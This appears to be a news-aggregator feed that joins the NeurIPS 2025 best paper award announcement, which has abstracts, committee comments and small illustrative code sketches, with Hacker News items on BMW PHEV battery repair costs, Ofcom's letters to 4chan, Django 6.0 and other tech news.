Large language models (LMs) often struggle to generate diverse, human-like creative content, raising concerns about the long-term homogenization of human thought through repeated exposure to similar outputs. Yet scalable methods for evaluating LM output diversity remain limited, especially beyond narrow tasks such as random number or name generation, or beyond repeated sampling from a single model. To address this gap, we introduce Infinity-Chat, a large-scale dataset of 26K diverse, real-world, open-ended user queries that admit a wide range of plausible answers with no single ground truth. We introduce the first comprehensive taxonomy for characterizing the full spectrum of open-ended prompts posed to LMs, comprising 6 top-level categories (e.g., creative content generation, brainstorm & ideation) that further breaks down to 17 subcategories. Using Infinity-Chat, we present a large-scale study of mode collapse in LMs, revealing a pronounced Artificial Hivemind effect in open-ended generation of LMs, characterized by (1) intra-model repetition, where a single model consistently generates similar responses, and more so (2) inter-model homogeneity, where different models produce strikingly similar outputs. Infinity-Chat also includes 31,250 human annotations, across absolute ratings and pairwise preferences, with 25 independent human annotations per example. This enables studying collective and individual-specific human preferences in response to open-ended queries. Our findings show that state-of-the-art LMs, reward models, and LM judges are less well calibrated to human ratings on model generations that elicit differing idiosyncratic annotator preferences, despite maintaining comparable overall quality. Overall, INFINITY-CHAT presents the first large-scale resource for systematically studying real-world open-ended queries to LMs, revealing critical insights to guide future research for mitigating long-term AI safety risks posed by the Artificial Hivemind.

Reflections from the Selection Committee

This paper makes a substantial and timely contribution to the understanding of diversity, pluralism, and societal impact in modern language models. The authors introduce Infinity-Chat, a rigorously constructed benchmark of 26K real-world open-ended queries paired with 31K dense human annotations, enabling systematic evaluation of creative generation, ideation, and subjective preference alignment, dimensions historically underexamined in AI evaluation. Beyond releasing a valuable dataset, the paper provides deep analytical insights through the first comprehensive taxonomy of open-ended prompts and an extensive empirical study across more than 70 models, revealing the Artificial Hivemind effect: pronounced intra- and inter-model homogenization that raises serious concerns about long-term risks to human creativity, value plurality, and independent thinking. The findings expose critical miscalibration between current reward models, automated judges, and diverse human preferences, highlighting the tension between alignment and diversity and establishing a foundation for future work on preserving heterogeneity in AI systems. Overall, this work sets a new standard for datasets and benchmarks that advance scientific understanding and address pressing societal challenges rather than solely improving technical performance.
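
To make "inter-model homogeneity" concrete, here is a toy sketch (ours, in Python; the paper's metrics and human-annotation pipeline are far richer) that scores lexical overlap between hypothetical model answers to one open-ended prompt:

def jaccard(a: str, b: str) -> float:
    # word-level Jaccard similarity between two answers
    wa, wb = set(a.lower().split()), set(b.lower().split())
    return len(wa & wb) / len(wa | wb)

answers = {  # hypothetical outputs from three models for the same prompt
    "model_a": "a gentle rain traced silver lines down the window",
    "model_b": "gentle rain traced silver lines down the glass",
    "model_c": "the crowd roared as the underdogs scored at the buzzer",
}
names = sorted(answers)
for i, x in enumerate(names):
    for y in names[i + 1:]:
        print(x, y, round(jaccard(answers[x], answers[y]), 2))
# High a/b overlap is the homogeneity pattern; c is the diverse outlier.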

Gated Attention for Large Language Models: Non-linearity, Sparsity, and Attention-Sink-Free

Zihan Qiu, Zekun Wang, Bo Zheng, Zeyu Huang, Kaiyue Wen, Songlin Yang, Rui Men, Le Yu, Fei Huang, Suozhi Huang, Dayiheng Liu, Jingren Zhou, Junyang Lin

Abstract

Gating mechanisms have been widely utilized, from early models like LSTMs and Highway Networks to recent state space models, linear attention, and also softmax attention. Yet, existing literature rarely examines the specific effects of gating. In this work, we conduct comprehensive experiments to systematically investigate gating-augmented softmax attention variants. Specifically, we perform a comprehensive comparison over 30 variants of 15B Mixture-of-Experts (MoE) models and 1.7B dense models trained on a 3.5 trillion token dataset. Our central finding is that a simple modification—applying a head-specific sigmoid gate after the Scaled Dot-Product Attention (SDPA)—consistently improves performance. This modification also enhances training stability, tolerates larger learning rates, and improves scaling properties. By comparing various gating positions and computational variants, we attribute this effectiveness to two key factors: (1) introducing non-linearity upon the low-rank mapping in the softmax attention, and (2) applying query-dependent sparse gating scores to modulate the SDPA output. Notably, we find this sparse gating mechanism mitigates massive activation and attention sink, and enhances long-context extrapolation performance. We also release related code ( https://github.com/qiuzh20/gated_attention ) and models ( https://huggingface.co/QwQZh/gated_attention ) to facilitate future research. Furthermore, the most effective SDPA output gating is used in the Qwen3-Next models ( https://huggingface.co/collections/Qwen/qwen3-next ).

Reflections from the Selection Committee

The main finding of this paper is that the performance of large language models using softmax attention can be consistently improved by introducing head-specific sigmoid gating after the scaled dot product attention operation in both dense and mixture-of-experts (MoE) Transformer models. This finding is backed up by more than thirty experiments on different variants of gated softmax attention using 15B MoE and 1.7B dense models trained on large-scale datasets of 400B, 1T, or 3.5T tokens. The paper also includes careful analyses showing that the introduction of the authors’ recommended form of gating improves the training stability of large language models, reduces the “attention sink” phenomenon that has been widely reported in attention models, and enhances the performance of context length extension. The main recommendation of the paper is easily implemented, and given the extensive evidence provided in the paper for this modification to LLM architecture, we expect this idea to be widely adopted. This paper represents a substantial amount of work that is possible only with access to industrial scale computing resources, and the authors’ sharing of the results of their work, which will advance the community’s understanding of attention in large language models, is highly commendable, especially in an environment where there has been a move away from open sharing of scientific results around LLMs.
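
As a concrete illustration, here is a minimal sketch of the recommended modification (ours, in PyTorch, not the authors' released code; the layer names, gate parameterization, and causal setting are assumptions):

import torch
import torch.nn as nn
import torch.nn.functional as F

class GatedAttention(nn.Module):
    """Softmax attention with a head-specific sigmoid gate on the SDPA output."""
    def __init__(self, d_model: int, n_heads: int):
        super().__init__()
        assert d_model % n_heads == 0
        self.h, self.dh = n_heads, d_model // n_heads
        self.qkv = nn.Linear(d_model, 3 * d_model)
        self.gate = nn.Linear(d_model, d_model)  # query-dependent gate logits
        self.out = nn.Linear(d_model, d_model)

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        b, t, d = x.shape
        q, k, v = self.qkv(x).chunk(3, dim=-1)
        # reshape to (batch, heads, time, head_dim)
        q, k, v = (z.view(b, t, self.h, self.dh).transpose(1, 2) for z in (q, k, v))
        y = F.scaled_dot_product_attention(q, k, v, is_causal=True)
        # the paper's key modification: an elementwise sigmoid gate,
        # computed from the same input as the queries, applied per head
        # to the SDPA output
        g = torch.sigmoid(self.gate(x)).view(b, t, self.h, self.dh).transpose(1, 2)
        y = y * g
        return self.out(y.transpose(1, 2).reshape(b, t, d))

Because the gate is computed from the attention input, it is query-dependent, and because it acts on each head's output slice separately, it is head-specific, which is what the committee's summary highlights.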

1000 Layer Networks for Self-Supervised RL: Scaling Depth Can Enable New Goal-Reaching Capabilities

Kevin Wang, Ishaan Javali, Michał Bortkiewicz, Tomasz Trzcinski, Benjamin Eysenbach

Abstract

Scaling up self-supervised learning has driven breakthroughs in language and vision, yet comparable progress has remained elusive in reinforcement learning (RL). In this paper, we study building blocks for self-supervised RL that unlock substantial improvements in scalability, with network depth serving as a critical factor. Whereas most RL papers in recent years have relied on shallow architectures (around 2–5 layers), we demonstrate that increasing the depth up to 1024 layers can significantly boost performance. Our experiments are conducted in an unsupervised goal-conditioned setting, where no demonstrations or rewards are provided, so an agent must explore (from scratch) and learn how to maximize the likelihood of reaching commanded goals. Evaluated on simulated locomotion and manipulation tasks, our approach increases the performance of the self-supervised contrastive RL algorithm by a large factor, outperforming other goal-conditioned baselines. Increasing the model depth not only increases success rates but also qualitatively changes the behaviors learned.

Reflections from the Selection Committee

This paper challenges the conventional assumption that the learning signal provided by reinforcement learning (RL) is too weak to effectively guide the many parameters of deep neural networks, the assumption behind the practice of training large AI systems predominantly through self-supervision, with RL reserved solely for fine-tuning. The work introduces a novel and easy-to-implement RL paradigm for the effective training of very deep neural networks, employing self-supervised and contrastive RL. The accompanying analysis demonstrates that RL can scale efficiently with increasing network depth, leading to the emergence of more sophisticated capabilities. In addition to presenting compelling results, the study includes several useful analyses, for example highlighting the important role of batch size scaling for deeper networks within contrastive RL.
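
To make "1024 layers" concrete, here is a rough sketch (ours; the paper's actual block structure, widths, and normalization choices may differ) of a pre-LayerNorm residual MLP encoder whose depth can be scaled into the thousands:

import torch.nn as nn

class ResidualBlock(nn.Module):
    def __init__(self, width: int):
        super().__init__()
        self.norm = nn.LayerNorm(width)
        self.ff = nn.Sequential(nn.Linear(width, width), nn.ReLU(),
                                nn.Linear(width, width))

    def forward(self, x):
        # the identity skip path keeps gradients usable at extreme depth
        return x + self.ff(self.norm(x))

def deep_encoder(width: int = 256, depth: int = 1024) -> nn.Module:
    # e.g. a state/goal encoder for contrastive RL built from `depth` blocks
    return nn.Sequential(*(ResidualBlock(width) for _ in range(depth)))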

Why Diffusion Models Don’t Memorize: The Role of Implicit Dynamical Regularization in Training

Tony Bonnaire, Raphaël Urfin, Giulio Biroli, Marc Mezard

Abstract

Diffusion models have achieved remarkable success across a wide range of generative tasks. A key challenge is understanding the mechanisms that prevent their memorization of training data and allow generalization. In this work, we investigate the role of the training dynamics in the transition from generalization to memorization. Through extensive experiments and theoretical analysis, we identify two distinct timescales: an early time τ_gen at which models begin to generate high-quality samples, and a later time τ_mem beyond which memorization emerges. Crucially, we find that τ_mem increases linearly with the training set size n, while τ_gen remains constant. This creates a growing window of training times where models generalize effectively, despite showing strong memorization if training continues beyond it. It is only when n becomes larger than a model-dependent threshold that overfitting disappears at infinite training times. These findings reveal a form of implicit dynamical regularization in the training dynamics, which makes it possible to avoid memorization even in highly overparameterized settings. Our results are supported by numerical experiments with standard U-Net architectures on realistic and synthetic datasets, and by a theoretical analysis using a tractable random features model studied in the high-dimensional limit.

Reflections from the Selection Committee

This paper presents foundational work on the implicit regularization dynamics of diffusion models, delivering a powerful result by unifying empirical observation with formal theory. The critical finding is the quantitative identification of two distinct, predictable timescales: an early, dataset-independent generalization onset followed by a memorization onset that grows linearly with dataset size. This demonstration of an expanding window for effective generalization is not merely an empirical finding but is rigorously explained by deriving the spectral properties of the random features model using random matrix theory. By linking the practical success of diffusion models directly to a provable dynamical property (the implicit postponement of overfitting), the paper provides fundamental, actionable insight into the mechanisms governing modern generative AI, setting a new standard for analytical depth in the study of generalization.
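
A back-of-envelope illustration of that dynamical picture, with made-up constants: if the memorization onset grows linearly with the training set size n while the generalization onset stays flat, the safe training window widens with data.

# Made-up constants, for intuition only (not the paper's fitted values).
tau_gen = 1_000                # steps until high-quality samples; ~constant in n
slope = 0.5                    # assumed linear growth rate of the memorization onset

for n in (10_000, 100_000, 1_000_000):
    tau_mem = int(slope * n)   # memorization onset grows linearly with n
    print(f"n={n:>9}: generalization window = [{tau_gen}, {tau_mem}] training steps")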

Runners Up

Does Reinforcement Learning Really Incentivize Reasoning Capacity in LLMs Beyond the Base Model?

Yang Yue, Zhiqi Chen, Rui Lu, Andrew Zhao, Zhaokai Wang, Yang Yue, Shiji Song, Gao Huang

Abstract

Reinforcement Learning with Verifiable Rewards (RLVR) has recently demonstrated notable success in enhancing the reasoning performance of large language models (LLMs), particularly in mathematics and programming tasks. It is widely believed that, similar to how traditional RL helps agents to explore and learn new strategies, RLVR enables LLMs to continuously self-improve, thus acquiring novel reasoning abilities that exceed the capacity of the corresponding base models. In this study, we take a critical look at the current state of RLVR by systematically probing the reasoning capability boundaries of RLVR-trained LLMs across diverse model families, RL algorithms, and math/coding/visual reasoning benchmarks, using pass@k at large k values as the evaluation metric. While RLVR improves sampling efficiency towards the correct path, we surprisingly find that current training does not elicit fundamentally new reasoning patterns. We observe that while RLVR-trained models outperform their base models at smaller values of k (e.g., k=1), base models achieve a higher pass@k score when k is large. Moreover, we observe that the reasoning capability boundary of LLMs often narrows as RLVR training progresses. Further coverage and perplexity analysis shows that the reasoning paths generated by RLVR models are already included in the base models' sampling distribution, suggesting that their reasoning abilities originate from and are bounded by the base model. From this perspective, treating the base model as an upper bound, our quantitative analysis shows that six popular RLVR algorithms perform similarly and remain far from optimal in fully leveraging the potential of the base model. In contrast, we find that distillation can introduce new reasoning patterns from the teacher and genuinely expand the model's reasoning capabilities. Taken together, our findings suggest that current RLVR methods have not fully realized the potential of RL to elicit genuinely novel reasoning abilities in LLMs. This underscores the need for improved RL paradigms, such as continual scaling and multi-turn agent-environment interaction, to unlock this potential.

Reflections from the Selection Committee

This paper delivers a masterfully executed and critically important negative finding on a widely accepted, foundational assumption in Large Language Model (LLM) research: that Reinforcement Learning with Verifiable Rewards (RLVR) elicits genuinely new reasoning capabilities. The paper shows that RLVR training, across various model families, tasks, and algorithms, enhances sampling efficiency without expanding the reasoning capacity already present in base models. RL narrows exploration: rewarded trajectories are amplified, but the broader solution space shrinks, revealing that RLVR optimizes within, rather than beyond, the base distribution. This is an important finding which will hopefully incentivize fundamentally new RL paradigms able to navigate the vast action space and genuinely expand LLM reasoning capabilities.
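
For readers unfamiliar with the evaluation metric, pass@k is typically computed with the unbiased estimator of Chen et al. (2021); a minimal sketch with hypothetical counts:

from math import comb

def pass_at_k(n: int, c: int, k: int) -> float:
    # With n samples, c of them correct: probability that at least one of
    # k draws without replacement is correct (unbiased estimator).
    if n - c < k:
        return 1.0  # fewer incorrect samples than draws, so a hit is guaranteed
    return 1.0 - comb(n - c, k) / comb(n, k)

print(pass_at_k(256, 8, 1))    # 0.03125: looks weak at k=1
print(pass_at_k(256, 8, 128))  # ~0.996: the same model looks strong at large k

Evaluating at large k is what lets the paper compare the reasoning boundary of a model (what it can ever solve) rather than just its sampling efficiency.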

Optimal Mistake Bounds for Transductive Online Learning

Zachary Chase, Steve Hanneke, Shay Moran, Jonathan Shafer

Abstract

We resolve a 30-year-old open problem concerning the power of unlabeled data in online learning by tightly quantifying the gap between transductive and standard online learning. We prove that for every concept class with Littlestone dimension d, the transductive mistake bound is at least Ω(√d). This establishes an exponential improvement over the previous, logarithmic lower bounds due to Ben-David, Kushilevitz, and Mansour (1995, 1997) and Hanneke, Moran, and Shafer (2023). We also show that our bound is tight: for every d, there exists a class of Littlestone dimension d with transductive mistake bound O(√d). Our upper bound also improves the previous best known upper bound from Ben-David et al. (1997). These results demonstrate a quadratic gap between transductive and standard online learning, thereby highlighting the benefit of advance access to the unlabeled instance sequence. This stands in stark contrast to the PAC setting, where transductive and standard learning exhibit similar sample complexities.

Reflections from the Selection Committee

This paper presents a breakthrough in learning theory, deserving the NeurIPS Best Paper Runner-Up award for its elegant, comprehensive, and definitive resolution of a 30-year-old open problem. The authors have not only precisely quantified the optimal mistake bound for transductive online learning as Ω(√d), but they have also achieved a tight match with an O(√d) upper bound. This establishes a quadratic gap between transductive and standard online learning, a result that represents an exponential leap beyond all previous logarithmic lower bounds and dramatically highlights the theoretical value of unlabeled data in this setting—a crucial insight distinct from its more limited role in PAC learning.
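
In symbols (our notation, not the paper's), using the classical fact that the optimal mistake bound in standard online learning equals the Littlestone dimension d (Littlestone, 1988):

% M_std and M_trans are the optimal worst-case mistake bounds for a
% concept class H of Littlestone dimension d; notation is ours.
\[
  M_{\mathrm{std}}(\mathcal{H}) = d,
  \qquad
  M_{\mathrm{trans}}(\mathcal{H}) = \Theta\!\left(\sqrt{d}\right)
\]
% The gap is quadratic: squaring the transductive bound recovers the standard one.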

The novelty and ingenuity of their proof techniques are quite remarkable. For the lower bound, the adversary employs a sophisticated strategy that balances forcing mistakes with carefully managing the shrinking of the version space, leveraging the concept of “paths in trees” as a fundamental underlying structure. The upper bound, demonstrating the learnability within O(√d) mistakes, introduces an innovative hypothesis class construction that embeds a “sparse encoding” for off-path nodes – a probabilistic design where most off-path labels are zero, but the rare ones carry immense information. The learner’s strategy to exploit this class is equally brilliant, integrating several non-standard sophisticated techniques: “Danger Zone Minimization” to control the instance sequence presented by the adversary, “Splitting Experts” via a multiplicative weights approach to handle uncertainty about a node’s on-path status, and a strategic “Transition to Halving” once sufficient information is gathered from the sparsely encoded off-path labels. This intricate interplay between a cleverly constructed hypothesis class and a highly adaptive learning algorithm showcases a masterclass in theoretical analysis and design.

Superposition Yields Robust Neural Scaling

Yizhou Liu, Ziming Liu, Jeff Gore

Abstract

The success of today’s large language models (LLMs) depends on the observation that larger models perform better. However, the origin of this neural scaling law, that loss decreases as a power law with model size, remains unclear. We propose that representation superposition, meaning that LLMs represent more features than they have dimensions, can be a key contributor to loss and cause neural scaling. Based on Anthropic’s toy model, we use weight decay to control the degree of superposition, allowing us to systematically study how loss scales with model size. When superposition is weak, the loss follows a power law only if data feature frequencies are power-law distributed. In contrast, under strong superposition, the loss generically scales inversely with model dimension across a broad class of frequency distributions, due to geometric overlaps between representation vectors. We confirmed that open-sourced LLMs operate in the strong superposition regime and have loss scaling inversely with model dimension, and that the Chinchilla scaling laws are also consistent with this behavior. Our results identify representation superposition as a central driver of neural scaling laws, providing insights into questions like when neural scaling laws can be improved and when they will break down.

Reflections from the Selection Committee

This paper moves beyond observation of neural scaling laws—the empirically established phenomenon in which model loss exhibits a power-law decrease as model size, dataset size, or computational resources are increased—to demonstrate that representation superposition constitutes the primary mechanism governing these laws. The authors introduce a controlled “toy model” to examine how superposition and data structure affect the scaling of loss with model size, and demonstrate that under strong superposition, where features overlap, the loss scales consistently as an inverse power law with respect to the model dimension. The core findings are supported by a series of carefully designed experiments and offer fresh insights into an important research area.
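
The geometric mechanism named in the abstract (overlaps between representation vectors) is easy to check numerically. A toy sketch (ours, illustrative only): for random unit vectors in m dimensions, the mean squared pairwise overlap is 1/m, so interference between superposed features shrinks inversely with model dimension.

import numpy as np

rng = np.random.default_rng(0)
for m in (64, 256, 1024):
    v = rng.standard_normal((2000, m))
    v /= np.linalg.norm(v, axis=1, keepdims=True)   # 2000 random unit vectors
    sq = ((v[:1000] * v[1000:]).sum(axis=1)) ** 2   # 1000 independent pairs
    print(m, round(sq.mean(), 5), round(1 / m, 5))  # empirical vs predicted 1/m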

The selection of these papers reflects the remarkable breadth of research presented at NeurIPS 2025, spanning generative modeling, reinforcement learning, natural language processing, learning theory, neural scaling, and benchmarking methodologies. The diversity of topics among the awarded papers demonstrates the vibrant and multifaceted nature of machine learning research.

We extend our congratulations to all the award recipients and look forward to seeing these works presented at the conference this December! Please note that the award certificates will be given out by the session chairs during each paper's oral session.

We would also like to extend our gratitude and appreciation to the members of the Best Paper Award Committee listed here.

Best Paper Award Committee for the Main Track and the Datasets and Benchmarks Track

  • Jacob Andreas (MIT, United States)
  • Sander Dieleman (Google DeepMind, UK)
  • Dilek Hakkani-Tur (University of Illinois Urbana-Champaign, United States)
  • Brian Kingsbury (IBM, United States)
  • Mirella Lapata (University of Edinburgh, Scotland)
  • Vincent Lepetit (Ecole des Ponts ParisTech, France)
  • Ulrich Paquet (AIMES & Google DeepMind, Africa)
  • Violet Peng (UCLA, United States)
  • Doina Precup (McGill University, Canada)
  • Masashi Sugiyama (RIKEN & University of Tokyo, Japan)
  • Vincent Tan (National University of Singapore, Singapore)
  • Yee Whye Teh (University of Oxford, United Kingdom)
  • Xing Xie (Microsoft, China)
  • Luke Zettlemoyer (University of Washington/Meta, United States)

BMW PHEV: When EU engineering becomes a synonym for "unrepairable" (EV Clinic)

Hacker News
evclinic.eu
2025-12-05 01:05:57
Comments...
Original Article

2021+ BMW PHEV iBMUCP Post-Crash Recovery — when EU engineering becomes a synonym for “unrepairable” and “generating waste”.

If you own a BMW PHEV — or if you’re an insurance company — every pothole, every curb impact, and even every rabbit jumping out of a bush represents a potential €5,000 cost, just for a single fuse inside the high-voltage battery system.
This “safety fuse” is designed to shut the system down the moment any crash event is detected. Sounds safe — but it is extremely expensive. Theoretically, insurance for a BMW PHEV should cost three times more than for an ICE vehicle or an EV.

Unfortunately, that’s not the only issue.

BMW has over-engineered the diagnostic procedure to such a level that even their own technicians often do not know the correct replacement process. And it gets worse: the original iBMUCP module, which integrates the pyrofuse, contactors, BMS, and internal copper-bonded circuitry, is fully welded shut. There are no screws and no service openings, and it is not designed to be opened, even though the pyrofuse and contactors are technically replaceable components. Additionally, the procedure requires flashing the entire vehicle both before and after the replacement, which adds several hours to the process and increases the risk of bricked components, which can raise the recovery cost by a factor of ten.

But that is still not the only problem.

Even after we managed to open the unit and access everything inside, we discovered that the Infineon TC375 MCU is fully locked. Both the D-Flash sectors and crash-flag areas are unreadable via DAP or via serial access.
Meaning: even if you replace the pyrofuse, you still cannot clear the crash flag, because the TC375 is cryptographically locked.

This leaves only one method:
➡️ Replace the entire iBMUCP module with a brand-new one. (€1,100 + tax, for a faulty fuse)

And the registration of the new component is easily one of the worst procedures we have ever seen. You need an ICOM, an IMIB, and an AOS subscription — totalling over €25,000 in tools — just to replace a fuse. (Even though we managed to activate this one with the IMIB alone, the full toolset will be necessary in some situations.)
Yes, you read that correctly: €25,000.

Many vehicles designed and produced in Europe — ICE, PHEV, and EV — have effectively become a misleading ECO exercise. Vehicles marketed as “CO₂-friendly” end up producing massive CO₂ footprints through forced services, throw-away components, high failure rates, unnecessary parts-manufacturing cycles, and overcomplicated service procedures — footprints far larger than what the public is told. If we are destroying our ICE automotive industry based on EURO norms, who is calculating the real ECO footprint of replacement-part manufacturing, unnecessary servicing, and real waste cost?

We saw this years ago on diesel and petrol cars:
DPF failures, EGR valves, high-pressure pumps, timing belts running in oil, low-quality automatic transmissions, and lubrication system defects. Everyone calculates the CO₂ footprint of a moving vehicle — nobody calculates the CO₂ footprint of a vehicle that is constantly broken and creating waste.

ISTA’s official iBMUCP replacement procedure is so risky that if you miss one single step — poorly explained within ISTA — the system triggers an ANTITHEFT LOCK.
This causes the balancing controller to wipe and lock the modules.
Meaning: even in an authorised service centre, the system can accidentally delete the configuration, and the car ends up needing not only a new iBMUCP but also all-new battery modules.

Yes — replacing a fuse can accidentally trigger the replacement of all healthy HV modules, at €6,000 + VAT per module, plus a massive unknown CO₂ footprint.
This has already happened to several workshops in the region.

The next problem: BMW refuses to provide training access for ISTA usage. We submitted two official certification requests — both were rejected by the central office in Austria, which is borderline discriminatory.

One more problem: battery erasure can happen in an OEM workshop just as it can in ours or any other third-party workshop, but if the procedure was started in workshop 1, it cannot be continued in workshop 2. If battery damage happens in our workshop during a fuse change and a battery swap is then needed, neither we nor an OEM workshop covers the cost of a completely new battery pack, which heavily increases ownership costs.

All of this represents unnecessary complexity with no meaningful purpose.
While Tesla’s pyrofuse costs €11 and a BMS reset is around €50, allowing the car to be safely restored, BMW’s approach borders on illogical engineering, with no benefit to safety and no benefit to anti-theft protection — the only outcomes are billable labour hours and massive amounts of needless electronic and lithium waste.

Beyond that, together with our colleagues from Hungary, we are actively working on breaking the JTAG/DAP protection to gain direct access to the D-Flash data and decrypt its contents. The goal is to simplify the entire battery-recovery procedure, reduce costs, and actually deliver the CO₂ reduction that the EU keeps advertising — since the manufacturers clearly won’t.

Part number: 61 27 8 880 208

Faults:

  • 21F2A8 – High-voltage battery unit, terminal; high-voltage battery safety capsule: defective trigger/control electronics
  • 21F35B – High-voltage battery unit, voltage and electric current sensor: counter for the reuse of cell modules exceeded (safety function)
  • 21F393 – High-voltage battery unit, cumulative fault: memory of faults that prevent active transport
  • 3B001D – High-voltage battery unit, contactor excitation circuit breakers: double fault
  • 21F37E – Collision detection: collision detected due to ACSM signal
  • 21F04B – High-voltage battery unit, safety function: reset command executed

OEM service cost: €4,000 + tax (approx. – if you have a BMW quote, send it)
OEM iBMUCP: €1,100 + tax
Labour hours: 24–50 h

EVC: €2,500 + tax (full service)

It is cheaper to change the LG battery on a Tesla than to change a fuse on a BMW PHEV, and probably with a smaller CO₂ footprint.

If you want to book your service with EV CLINIC:

Zagreb 1: www.evclinic.hr
Berlin: www.evclinic.de
Slovenia: www.evclinic.si
Serbia: www.evclinic.rs

The Ofcom Files, Part 4: Ofcom Rides Again

Hacker News
prestonbyrne.com
2025-12-05 00:41:08
Comments...
Original Article

This is a continuation of the Ofcom Files, a series of First Amendment-protected public disclosures designed to inform the American and British public about correspondence that the UK’s censorship agency, Ofcom, would prefer to keep secret. See Part 1 , Part 2 , and Part 3 .

We heard from Ofcom again today.

The agency writes:

The full letter Ofcom attached to their e-mail was full of legally illiterate nonsense claiming extraterritorial power to enforce their censorship laws against Americans in the United States.

Bryan Lunduke highlighted the key bits over on X. The full letter is at the bottom of this post.

The United Kingdom’s Ofcom has sent yet another threatening letter to 4chan (a US company).

After 4chan refused to pay fines to a foreign government, the United Kingdom says they are “expanding the scope of the investigation into 4chan”.

UK’s Ofcom states that United Kingdom… pic.twitter.com/nNhhCmHKsa

— The Lunduke Journal (@LundukeJournal) December 4, 2025

We replied as follows:

Sirs,

Last night Sarah Rogers, the United States Under Secretary of State for Public Diplomacy, let it be known on GB News, in London, that the United States Congress is considering introducing a federal version of the GRANITE Act.

The GRANITE Act, at state level, is a foreign censorship shield law reform proposal I threw together exactly 51 days ago on my personal blog. Colin Crossman, Wyoming’s Deputy Secretary of State, turned it into a bill. Now, it seems, very dedicated staffers in Congress and our principled elected representatives are keen to make it a federal law.

The proposal was inspired by your agency’s censorship letters, letters targeting Americans in America for conduct occurring wholly and exclusively in America, letters just like this one and the dozen others you’ve sent to my countrymen over the last eleven months.

It was also inspired by the passive-aggressive phone call I had with officials from your Home Office in 2023 asking me how my clients would implement your rules because, according to them, my clients’ users would demand that they comply (as far as I am aware, of my clients’ tens of millions of users among their various websites, not a single one has asked to be censored by the British). I replied that if your country wanted to censor my clients, the British Army would need to commence a ground invasion of the United States and seize their servers by force. That answer remains unchanged.

4chan is a website where users are free to remain anonymous. Your “age assurance” rules would destroy anonymity online, which is protected by the First Amendment. Accordingly, 4chan will not be implementing your “age assurance” rules.

Prompt and voluntary cooperation with law enforcement on child safety issues, including UK law enforcement, is what really matters for children’s safety online. That work happens quietly and non-publicly with officials who are tasked with performing it, namely, the police. My client will not be working with you on that important work because your agency is a censorship agency, not a law enforcement agency. Ofcom lacks the competence and the jurisdiction to do the work that actually matters in this space.

Regardless of whether GRANITE makes it on the books or not, and I will do everything in my personal power to ensure that it does, my clients don’t answer to you, 4chan included, because of the First Amendment. But then, Ofcom already knew that.

I copy the U.S. government and government officials in several states. My client reserves all rights.

Preston Byrne

Pretty sure my invitation to Number 10’s Christmas party is going to get lost in the post this year.

There is a possible future, and perhaps a very near one, in which these notices will be utterly impossible for foreign governments to send to American citizens; notices I have been parrying, professionally, for eight years.

America needs to protect her builders from this foreign overreach. I am extremely hopeful that the U.S. Congress and the White House will seal the deal and secure the American-led future of the Internet for decades to come. We’re not there yet, but we’re close.

AV1 – Now Powering 30% of Netflix Streaming

Hacker News
netflixtechblog.com
2025-12-05 00:09:57
Comments...

Django 6.0 released

Simon Willison
simonwillison.net
2025-12-04 23:57:34
Django 6.0 released Django 6.0 includes a flurry of neat features, but the two that most caught my eye are background workers and template partials. Background workers started out as DEP (Django Enhancement Proposal) 14, proposed and shepherded by Jake Howard. Jake prototyped the feature in django-t...
Original Article

Django 6.0 released. Django 6.0 includes a flurry of neat features, but the two that most caught my eye are background workers and template partials.

Background workers started out as DEP (Django Enhancement Proposal) 14, proposed and shepherded by Jake Howard. Jake prototyped the feature in django-tasks and wrote this extensive background on the feature when it landed in core just in time for the 6.0 feature freeze back in September.

Kevin Wetzels published a useful first look at Django's background tasks based on the earlier RC, including notes on building a custom database-backed worker implementation.
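
Here's roughly what the task API looks like, based on the DEP 14 / django-tasks interface; treat the module path, decorator form, and backend name as assumptions and check the 6.0 release notes for the final details:

# Sketch based on the DEP 14 / django-tasks API; exact names may differ in core.
from django.tasks import task

@task()
def send_welcome_email(user_id):
    ...  # look up the user and send the email

# In a view, queue the work instead of running it inline:
#   result = send_welcome_email.enqueue(user_id=42)

# settings.py needs a tasks backend configured, e.g. (assumed path):
#   TASKS = {"default": {"BACKEND": "django.tasks.backends.immediate.ImmediateBackend"}}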

Template Partials were implemented as a Google Summer of Code project by Farhan Ali Raza. I really like the design of this. Here's an example from the documentation showing the neat inline attribute which lets you both use and define a partial at the same time:

{# Define and render immediately. #}
{% partialdef user-info inline %}
    <div id="user-info-{{ user.username }}">
        <h3>{{ user.name }}</h3>
        <p>{{ user.bio }}</p>
    </div>
{% endpartialdef %}

{# Other page content here. #}

{# Reuse later elsewhere in the template. #}
<section class="featured-authors">
    <h2>Featured Authors</h2>
    {% for user in featured %}
        {% partial user-info %}
    {% endfor %}
</section>

You can also render just a named partial from a template directly in Python code like this:

return render(request, "authors.html#user-info", {"user": user})

I'm looking forward to trying this out in combination with HTMX.

I asked Claude Code to dig around in my blog's source code looking for places that could benefit from a template partial. Here's the resulting commit that uses them to de-duplicate the display of dates and tags from pages that list multiple types of content, such as my tag pages .

Text a community college librarian

Simon Willison
simonwillison.net
2025-12-04 23:52:21
I take tap dance evening classes at the College of San Mateo community college. A neat bonus of this is that I'm now officially a student of that college, which gives me access to their library... including the ability to send text messages to the librarians asking for help with research. I recently...
Original Article

I take tap dance evening classes at the College of San Mateo community college. A neat bonus of this is that I'm now officially a student of that college, which gives me access to their library... including the ability to send text messages to the librarians asking for help with research.

I recently wrote on my Niche Museums website about Coutellerie Nontronnaise, a historic knife manufactory in Nontron, France. They had a certificate on the wall claiming that they had previously held a Guinness World Record for the smallest folding knife, but I had been unable to track down any supporting evidence.

I posed this as a text message challenge to the librarians, and they tracked down the exact page from the 1989 "Le livre guinness des records" describing the record!

Le plus petit

Les établissements Nontronnaise ont réalisé un couteau de 10 mm de long, pour le Festival d’Aubigny, Vendée, qui s’est déroulé du 4 au 5 juillet 1987.

(Translation: “The smallest: the Nontronnaise workshops made a knife 10 mm long for the Festival d’Aubigny, Vendée, held on 4–5 July 1987.”)

Thank you, Maria at the CSM library.

This Month in Redox - November 2025

Lobsters
www.redox-os.org
2025-12-04 23:19:14
Comments...
Original Article
By Ribbon and Ron Williams

  • WebKitGTK3 web browser example and bottom system monitor

Redox OS is a complete Unix-like general-purpose microkernel-based operating system written in Rust. November was a very exciting month for Redox! Here’s all the latest news.

If you would like to support Redox, please consider donating or buying some merch!

Wayland on Redox!

